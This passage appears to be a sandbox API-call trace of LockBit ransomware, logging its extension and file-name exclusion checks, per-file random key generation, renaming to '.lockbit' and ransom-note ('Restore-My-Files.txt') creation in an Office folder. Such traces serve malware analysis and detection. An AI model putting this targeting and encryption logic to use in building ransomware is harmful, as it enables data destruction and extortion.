lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.235] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.235] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.236] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.236] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.236] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.236] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.236] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.236] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18236_.WMF") returned 1 [0201.236] lstrcmpiW (lpString1="ntldr", lpString2="BD18236_.WMF") returned 1 [0201.236] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18236_.WMF") returned 1 [0201.236] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18236_.WMF") returned 1 [0201.236] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18236_.WMF") returned -1 [0201.236] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18236_.WMF") returned 1 [0201.236] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18236_.WMF") returned 1 [0201.236] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.236] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF") returned=".WMF" [0201.236] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.236] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.237] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.237] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.238] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.238] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.238] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.238] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.238] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF.lockbit") returned 79 [0201.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18236_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.239] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.239] malloc (_Size=0x40068) returned 0x3d70450 [0201.240] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1748) returned 1 [0201.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.240] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0201.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0201.241] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0201.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.264] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.264] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.265] free (_Block=0x1fa2ed8) [0201.265] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.265] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.265] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29966d00, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc98140, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x29966d00, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x5fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18237_.WMF", cAlternateFileName="")) returned 1 [0201.265] lstrcmpiW (lpString1=".", lpString2="BD18237_.WMF") returned -1 [0201.265] lstrcmpiW (lpString1="..", lpString2="BD18237_.WMF") returned -1 [0201.265] PathFindExtensionW (pszPath="BD18237_.WMF") returned=".WMF" [0201.265] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.265] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.266] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.266] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18237_.WMF") returned 1 [0201.267] lstrcmpiW (lpString1="ntldr", lpString2="BD18237_.WMF") returned 1 [0201.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18237_.WMF") returned 1 [0201.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18237_.WMF") returned 1 [0201.267] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18237_.WMF") returned -1 [0201.267] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18237_.WMF") returned 1 [0201.267] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18237_.WMF") returned 1 [0201.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF") returned=".WMF" [0201.267] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.267] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.267] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.268] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.268] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF.lockbit") returned 79 [0201.268] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18237_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.271] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.271] malloc (_Size=0x40068) returned 0x3df0008 [0201.271] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1532) returned 1 [0201.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.272] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.278] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.278] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.278] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.278] free (_Block=0x1fa2ed8) [0201.278] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.278] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.278] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb50ffe00, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc98140, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb50ffe00, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18238_.WMF", cAlternateFileName="")) returned 1 [0201.278] lstrcmpiW (lpString1=".", lpString2="BD18238_.WMF") returned -1 [0201.278] lstrcmpiW (lpString1="..", lpString2="BD18238_.WMF") returned -1 [0201.278] PathFindExtensionW (pszPath="BD18238_.WMF") returned=".WMF" [0201.278] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.278] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.278] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.278] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.278] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.278] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.278] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.279] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.279] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.280] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18238_.WMF") returned 1 [0201.280] lstrcmpiW (lpString1="ntldr", lpString2="BD18238_.WMF") returned 1 [0201.280] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18238_.WMF") returned 1 [0201.280] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18238_.WMF") returned 1 [0201.280] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18238_.WMF") returned -1 [0201.280] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18238_.WMF") returned 1 [0201.280] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18238_.WMF") returned 1 [0201.280] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.280] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF") returned=".WMF" [0201.280] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.281] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.281] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.282] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.282] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft 